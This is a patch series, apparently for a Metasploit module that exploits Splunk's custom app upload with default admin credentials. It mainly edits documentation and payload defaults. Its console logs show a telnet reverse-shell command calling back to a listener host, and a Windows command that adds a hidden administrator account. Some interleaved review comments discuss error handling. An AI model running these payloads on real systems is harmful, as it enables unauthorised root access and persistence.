4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b2ddf9dc45b1..2330afe417fd 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
@@ -22,10 +22,10 @@ Version 7.2.4 has been tested successfully against OSX as well. 8. If targeting linux or macos set proper payload * ```SET TARGET [1|3]``` - *```set payload cmd/unix/reverse_python``` + * ```set payload cmd/unix/reverse_python``` If targeting windows set proper payload * ```SET TARGET 2``` - set payload cmd/windows/adduser + * ```set payload cmd/windows/adduser``` 9. You should get a reverse shell on port 4444 via the predefined handler. ## External Demo From f6e9410d87804bd9685e453093344e3edffc1ba9 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 14:43:47 +0100 Subject: [PATCH 11/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 2330afe417fd..106147dc7246 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -23,7 +23,8 @@ Version 7.2.4 has been tested successfully against OSX as well. 8. If targeting linux or macos set proper payload * ```SET TARGET [1|3]``` * ```set payload cmd/unix/reverse_python``` - If targeting windows set proper payload + + If targeting windows set proper payload * ```SET TARGET 2``` * ```set payload cmd/windows/adduser``` 9. You should get a reverse shell on port 4444 via the predefined handler. From 2f1ee95073312fb5b3a0e8171f29d7ac4df2b118 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 15:11:04 +0100 Subject: [PATCH 12/42] Update splunk_upload_app_exec.rb --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 4454cf2c9ec4..2ae0a186bdb3 100644 
--- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -49,18 +49,21 @@ def initialize(info = {}) { 'Arch' => ARCH_CMD, 'Platform' => %w(linux unix) + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], [ 'Splunk >= 7.2.4 / Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' + 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'} } ], [ 'Splunk >= 7.2.4 / OSX', { 'Arch' => ARCH_CMD, 'Platform' => %w(linux unix) + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], [ 'Splunk >= 5.0.1 / Linux', From d7d49cba2e9bb6f365380b25880a9249da2b4e76 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 15:20:28 +0100 Subject: [PATCH 13/42] Update splunk_upload_app_exec.md --- .../exploit/multi/http/splunk_upload_app_exec.md | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 106147dc7246..5115071e6b1f 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
@@ -20,14 +20,10 @@ Version 7.2.4 has been tested successfully against OSX as well. 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` - 8. If targeting linux or macos set proper payload - * ```SET TARGET [1|3]``` - * ```set payload cmd/unix/reverse_python``` - - If targeting windows set proper payload - * ```SET TARGET 2``` - * ```set payload cmd/windows/adduser``` - 9. You should get a reverse shell on port 4444 via the predefined handler. + 8. (7.2.4 only) If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. + + 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) ## External Demo * [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
From 3316e8c4bfe03cc04879e2cd696d64ee0e37799b Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 19:00:33 +0100 Subject: [PATCH 14/42] fixed standard payload syntax --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 2ae0a186bdb3..ce131ec3d506 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -48,21 +48,21 @@ def initialize(info = {}) [ 'Splunk >= 7.2.4 / Linux', { 'Arch' => ARCH_CMD, - 'Platform' => %w(linux unix) + 'Platform' => %w(linux unix), 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], [ 'Splunk >= 7.2.4 / Windows', { 'Arch' => ARCH_CMD, - 'Platform' => 'win' + 'Platform' => 'win', 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'} } ], [ 'Splunk >= 7.2.4 / OSX', { 'Arch' => ARCH_CMD, - 'Platform' => %w(linux unix) + 'Platform' => %w(linux unix), 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], From 245a6cac63967443bf13e5f2eb1ebcbc726c8ea0 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 19:03:35 +0100 Subject: [PATCH 15/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 5115071e6b1f..e865d0ca72c5 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
@@ -15,13 +15,13 @@ Version 7.2.4 has been tested successfully against OSX as well. 1. Start msfconsole 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` 3. Set required variables (you will need admin credentials) - 4. Do: ```SET TARGET 1``` + 4. Do: ```SET LHOST 192.168.1.2``` 5. Do: ```SET RHOST 192.168.1.1``` 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` - 8. (7.2.4 only) If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. - If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. + 8. * (7.2.4 only) If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) From 983442d690e7ab473fe61a572db7c97aeb8dfa9d Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 19:04:45 +0100 Subject: [PATCH 16/42] Update splunk_upload_app_exec.rb --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index ce131ec3d506..2dd16e74a62f 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -69,13 +69,15 @@ def initialize(info = {}) [ 'Splunk >= 5.0.1 / Linux', { 'Arch' => ARCH_CMD, - 'Platform' => %w(linux unix) + 'Platform' => %w(linux unix), + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], [ 'Splunk >= 5.0.1 / Windows', { 'Arch' => ARCH_CMD, - 'Platform' => 'win' + 'Platform' => 'win', + 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'} } ] ], 
From 998f9403ffeb1023d3e84f340aef3b0bf7b66486 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 19:04:57 +0100 Subject: [PATCH 17/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index e865d0ca72c5..a21632fdb996 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,7 +20,7 @@ Version 7.2.4 has been tested successfully against OSX as well. 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` - 8. * (7.2.4 only) If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. + 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) From f0dee60d589295e819c022f4be18073939b2dc2f Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:30:03 +0100 Subject: [PATCH 18/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index a21632fdb996..5d0449a11d13 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
@@ -1,7 +1,7 @@ ## Vulnerable Application This module exploits a feature of Splunk whereby a custom application can be -uploaded through the web based interface. Through the \'script\' search command a +uploaded through the web based interface. Through the `script` search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of "admin:changeme", From 3ca4a9bc03cdc92a4f71761b5df6ab015a15c600 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:36:35 +0100 Subject: [PATCH 19/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 5d0449a11d13..b7d262c7bb4a 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
@@ -5,9 +5,9 @@ uploaded through the web based interface. Through the `script` search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of "admin:changeme", -the default Administrator credential for Splunk. Note that the Splunk web interface -runs as SYSTEM on Windows, or as root on Linux by default. This module has been -tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. +the default Administrator credential for Splunk. +Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. +This module has been tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. Version 7.2.4 has been tested successfully against OSX as well. ## Verification Steps From d739ac231551724426e8b5d30ddce8db62b936c4 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:44:12 +0100 Subject: [PATCH 20/42] added tested list OS --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b7d262c7bb4a..b3a7475b45f4 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
@@ -7,8 +7,11 @@ perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of "admin:changeme", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. -This module has been tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. -Version 7.2.4 has been tested successfully against OSX as well. +This module has been tested successfully against: + +* 5.0 ([Ubuntu 10.04](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564), [Windows XP and Windows Server 2003 SP2](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564) with splunk-5.0.1-143156) +* 6.1, 6.1.1 +* 7.2.4 (OSX 10.14.3, Windows 10 10.0.17134.1, CentOS7 3.10.0-957.1.3.el7.x86_64) ## Verification Steps From ca234a1f9b96c1df8aebb2c2925ab3753f2e225f Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:45:42 +0100 Subject: [PATCH 21/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b3a7475b45f4..4eb9a5f2d555 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -18,8 +18,8 @@ This module has been tested successfully against: 1. Start msfconsole 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` 3. Set required variables (you will need admin credentials) - 4. Do: ```SET LHOST 192.168.1.2``` - 5. Do: ```SET RHOST 192.168.1.1``` + 4. Do: ```SET LHOST [ip]``` + 5. Do: ```SET RHOST [ip]``` 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` From e5653e348dc0cfc23d6421c00799f7f8059ba4ce Mon Sep 17 00:00:00 2001 
From: Matteo Malvica Date: Tue, 19 Mar 2019 10:52:07 +0100 Subject: [PATCH 22/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 4eb9a5f2d555..ee58fedcc68c 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -20,8 +20,6 @@ This module has been tested successfully against: 3. Set required variables (you will need admin credentials) 4. Do: ```SET LHOST [ip]``` 5. Do: ```SET RHOST [ip]``` - 6. Do: ```SET USERNAME admin``` - 7. Do: ```SET PASSWORD changeme``` 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. From a09ee632e825be43221056350958d041d4f4d154 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:53:55 +0100 Subject: [PATCH 23/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index ee58fedcc68c..612746a46c4b 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -27,9 +27,11 @@ This module has been tested successfully against: 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) ## External Demo -* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
-* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
-* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) + +* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html) + +* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script) ## Options From a0adb779b9e378f766036576b86757b46a727dcc Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:54:52 +0100 Subject: [PATCH 24/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 612746a46c4b..10f3d14096f1 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -37,7 +37,7 @@ This module has been tested successfully against: **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. - Is not enabled by default. + Default is `false` ## Scenarios From c5c597ec17a7ae5bf80b4a51bb5082c8203eb276 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 10:56:54 +0100 Subject: [PATCH 25/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 10f3d14096f1..a198006f8a51 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
@@ -41,9 +41,7 @@ This module has been tested successfully against: ## Scenarios -### Testing against 7.2.4 running on OSX - - Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API. +### Testing against 7.2.4 running on OSX 10.14.3 ``` msf5 exploit(multi/http/splunk_upload_app_exec) > From 3fc4a4cb5881e5329578d6685d022518f1b7bfef Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 11:00:11 +0100 Subject: [PATCH 26/42] Update splunk_upload_app_exec.md --- .../multi/http/splunk_upload_app_exec.md | 152 +++++++++++++++++- 1 file changed, 151 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index a198006f8a51..86138e0c83db 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -41,7 +41,7 @@ This module has been tested successfully against: ## Scenarios -### Testing against 7.2.4 running on OSX 10.14.3 +### Tested against 7.2.4 running on OSX 10.14.3 ``` msf5 exploit(multi/http/splunk_upload_app_exec) 
> @@ -86,3 +86,153 @@ msf5 exploit(multi/http/splunk_upload_app_exec) > exploit [*] B is input... [*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 ``` + +### Tested against 7.2.4 splunk-5.0.1-143156 on Ubuntu 10.04 + +``` +msf > use exploit/multi/http/splunk_upload_app_exec +msf exploit(splunk_upload_app_exec) > show options + +Module options (exploit/multi/http/splunk_upload_app_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASSWORD changeme yes The password for the specified username + Proxies no Use a proxy chain + RHOST yes The target address + RPORT 8000 yes The target port + SPLUNK_APP_FILE /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz yes The "rogue" Splunk application tgz + USERNAME admin yes The username with admin role to authenticate as + VHOST no HTTP server virtual host + + +Exploit target: + + Id Name + -- ---- + 0 Splunk 5.0.1 / Linux + + +msf exploit(splunk_upload_app_exec) > set RHOST 192.168.1.137 +RHOST => 192.168.1.137 +msf exploit(splunk_upload_app_exec) > rexploit +[*] Reloading module... + +[*] Using command: sh -c '(sleep 4597|telnet 192.168.1.129 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.129 4444 >/dev/null 2>&1 &)' +[*] Authenticating... +[*] Started reverse double handler +[*] Fetching csrf token from /en-US/manager/launcher/apps/local +[*] Uploading file upload_app_exec.tgz +[*] upload_app_exec successfully uploaded +[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline +[*] Invoking script command +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo uyYJGuNfu2AetK0N; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "uyYJGuNfu2AetK0N\r\n" +[*] Matching... +[*] B is input... 
+[*] Command shell session 1 opened (192.168.1.129:4444 -> 192.168.1.137:41432) at 2012-12-07 11:53:35 +0100 + +id +uid=0(root) gid=0(root) groups=0(root) +``` + +### Tested against splunk-5.0.1-143156 on Windows XP + +``` +msf exploit(splunk_upload_app_exec) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Splunk 5.0.1 / Linux + 1 Splunk 5.0.1 / Windows + + +msf exploit(splunk_upload_app_exec) > set target 1 +target => 1 +msf exploit(splunk_upload_app_exec) > set payload cmd/windows/adduser +payload => cmd/windows/adduser +msf exploit(splunk_upload_app_exec) > show options + +Module options (exploit/multi/http/splunk_upload_app_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + PASSWORD changeme yes The password for the specified username + Proxies no Use a proxy chain + RHOST 192.168.1.137 yes The target address + RPORT 8000 yes The target port + SPLUNK_APP_FILE /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz yes The "rogue" Splunk application tgz + USERNAME admin yes The username with admin role to authenticate as + VHOST no HTTP server virtual host + + +Payload options (cmd/windows/adduser): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CUSTOM no Custom group name to be used instead of default + PASS Metasploit$1 yes The password for this user + USER metasploit yes The username to create + WMIC false yes Use WMIC on the target to resolve administrators group + + +Exploit target: + + Id Name + -- ---- + 1 Splunk 5.0.1 / Windows + + +msf exploit(splunk_upload_app_exec) > rexploit +[*] Reloading module... + +[*] Using command: cmd.exe /c net user metasploit Metasploit$1 /ADD && net localgroup Administrators metasploit /ADD +[*] Authenticating... 
+[*] Fetching csrf token from /en-US/manager/launcher/apps/local +[*] Uploading file upload_app_exec.tgz +[*] upload_app_exec successfully uploaded +[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline +[*] Invoking script command +``` + +After that, on the victim machine: + +``` +C:\Documents and Settings\Administrator>net user metasploit +User name metasploit +Full Name +Comment +User's comment +Country code 000 (System Default) +Account active Yes +Account expires Never + +Password last set 12/6/2012 11:19 PM +Password expires 1/18/2013 10:07 PM +Password changeable 12/6/2012 11:19 PM +Password required Yes +User may change password Yes + +Workstations allowed All +Logon script +User profile +Home directory +Last logon Never + +Logon hours allowed All + +Local Group Memberships *Administrators *Users +Global Group memberships *None +The command completed successfully. + + +C:\Documents and Settings\Administrator> +``` From 087cef380d0f72b8370491081891c13fc9a10c56 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Tue, 19 Mar 2019 11:02:01 +0100 Subject: [PATCH 27/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 86138e0c83db..88ef28669ad5 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -38,6 +38,10 @@ This module has been tested successfully against: **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. Default is `false` + **USERNAME** + Default is `admin` + **PASSWORRD** + Default is `changeme` ## Scenarios From 698cf5ea916d78756f66f77801bd7847d4b20398 Mon Sep 17 00:00:00 2001 
From: Matteo Malvica Date: Tue, 19 Mar 2019 11:02:44 +0100 Subject: [PATCH 28/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 88ef28669ad5..2026174a34d0 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -38,9 +38,11 @@ This module has been tested successfully against: **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. Default is `false` + **USERNAME** Default is `admin` - **PASSWORRD** + + **PASSWORD** Default is `changeme` ## Scenarios From f98ad82583c1c99cc61691fedfeb1a5423fa2cfe Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 13:46:44 +0100 Subject: [PATCH 29/42] Update modules/exploits/multi/http/splunk_upload_app_exec.rb Co-Authored-By: avanzo --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 2dd16e74a62f..0dfec1e6c5e1 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -464,7 +464,7 @@ def do_get_state_token(uri) @state_token = Regexp.last_match(1) unless @state_token - fail_with(Failure::Unknown, "state token form Key not found") unless @state_token + fail_with(Failure::Unknown, "state token form Key not found") end end From 109b2bcf7e5ec38d3af015e217472392e7ebdc37 Mon Sep 17 00:00:00 2001 
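Review bot: `fail_with(Failure::Unknown, "state token form Key not found")` reports a missing CSRF state token as an unknown failure, but the server did answer and simply did not contain the token, which is exactly what `Failure::UnexpectedReply` exists for; `Failure::Unknown` hides that distinction from whoever triages the run. With the redundant inner `unless @state_token` gone, the block collapses to the modifier form `fail_with(Failure::UnexpectedReply, 'state token not found in response') unless @state_token`. `do_get_state_token` starts outside the hunk, so the request and the regex that populate `@state_token` are not visible here.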
From: bcoles Date: Tue, 19 Mar 2019 13:46:57 +0100 Subject: [PATCH 30/42] Update modules/exploits/multi/http/splunk_upload_app_exec.rb Co-Authored-By: avanzo --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 0dfec1e6c5e1..b48de4c03d29 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -465,7 +465,6 @@ def do_get_state_token(uri) unless @state_token fail_with(Failure::Unknown, "state token form Key not found") - end end From 290a4221024de46803cd77da99348bf4c4ce89dc Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 13:56:32 +0100 Subject: [PATCH 31/42] Update documentation/modules/exploit/multi/http/splunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 2026174a34d0..b73714c5f0f5 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
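Review bot: Removing this `end` leaves a single `end` on the new side for the two constructs still open at this point, the `unless @state_token` block and `def do_get_state_token` itself, so unless a closing `end` sits in context not shown here the method is no longer terminated and the file will not parse. If the intent was to drop the block rather than its terminator, delete the `unless @state_token` line instead and write `fail_with(Failure::Unknown, "state token form Key not found") unless @state_token`, keeping the method's `end`. The start of `do_get_state_token` is outside the hunk.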
@@ -24,7 +24,7 @@ This module has been tested successfully against: 8. * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected. * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected. - 9. You should get either a reverse shell on port 4444 via the predefined handler (linux/osx) or a new user in case (windows target) + 7. You should get either a reverse shell on port 4444 via the predefined handler (Linux/OSX) or a new user in case (windows target) ## External Demo * [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) From aff77e58bfc1613df40e2ea2a04998736647bd8c Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Mar 2019 13:57:19 +0100 Subject: [PATCH 32/42] Update modules/exploits/multi/http/splunk_upload_app_exec.rb Co-Authored-By: avanzo --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index b48de4c03d29..02702a3d3dde 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -416,7 +416,7 @@ def do_upload_app_7(app_name, file_name) { 'uri' => '/en-US/manager/appinstall/_upload', 'method' => 'POST', - 'cookie' => 